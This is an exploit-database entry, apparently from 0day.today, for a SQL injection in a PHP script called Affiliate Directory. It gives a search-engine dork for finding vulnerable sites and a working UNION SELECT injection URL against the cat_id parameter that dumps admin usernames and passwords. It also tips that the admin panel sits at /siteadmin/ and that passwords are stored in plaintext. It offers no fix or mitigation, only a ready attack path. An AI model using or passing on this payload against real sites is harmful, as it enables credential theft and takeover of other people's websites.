id: 2811
date: 04/03/2008
title: Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility
author: t0pP8uZz
cves: 

==============================================================
Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility
==============================================================



--==+================================================================================+==--
--==+		    Affiliate Directory SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

                       
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: "Search Affiliate Programs:" > Home > Newest Links


DESCRIPTION: 
Affiliate Directory suffers from insecure mysql querys, the script is widely published thoughout the web.
the below injections can retrive the admin username and password.


EXPLOITS:
http://server.com/directory.php?ax=list&sub=8&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4/**/FROM/**/admin/*


NOTE/TIP: 
admin login is at /siteadmin/
passwords are in plaintext




#  0day.today [2023-03-22]  #